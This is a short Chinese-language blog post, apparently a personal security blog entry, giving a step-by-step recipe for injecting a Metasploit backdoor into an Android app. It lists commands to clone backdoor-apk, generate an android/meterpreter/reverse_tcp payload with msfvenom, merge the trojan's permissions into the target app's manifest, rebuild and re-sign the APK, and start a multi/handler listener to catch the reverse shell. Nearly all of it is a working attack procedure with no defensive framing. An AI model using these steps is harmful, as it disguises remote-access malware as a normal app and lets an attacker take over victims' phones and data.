avatar

目录
Android应用植入metasploit后门

工具

  • kali
  • backdoor-apk
  • apktool
  • apk文件

环境安装

  • backdoor-apk:git clone https://github.com/dana-at-cp/backdoor-apk.git
  • 兼容库:apt-get install lib32stdc++6 lib32ncurses5 lib32z1

步骤

  • cd backdoor-apk/backdoor-apk,将apk文件复制到该目录下
  • ./backdoor-apk.sh apk文件名 ,选择payloadandroid/meterpreter/reverse_tcp

  • /root/backdoor-apk/backdoor-apk/original/dist目录找到新生成的apk,2.apk

  • 使用Apktool 反编译,apktool d /root/2.apk

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=5555 -o 3.apk,再使用apktool反编译新生成的木马apk

  • 打开3目录下的AndroidManifest.xml,将需要的权限复制到2目录下的AndroidManifest.xml

  • apktool b /root/2 打包应用

  • keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore生成签名证书进行签名

  • 生成完成之后jarsigner -verbose -keystore android.keystore -signedjar 签名后文件名 签名apk文件名 android.keystore

  • msfconsole启动msf

  • use exploit/multi/handler启动监听模块

  • set PAYLOAD android/meterpreter/reverse_tcp设置payload

  • 在设置好lhost和lport就可以监听了

文章作者: 2hangd
文章链接: https://zhangding222.github.io/2018/12/29/Android应用植入metasploit后门/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 2hangding's bl0g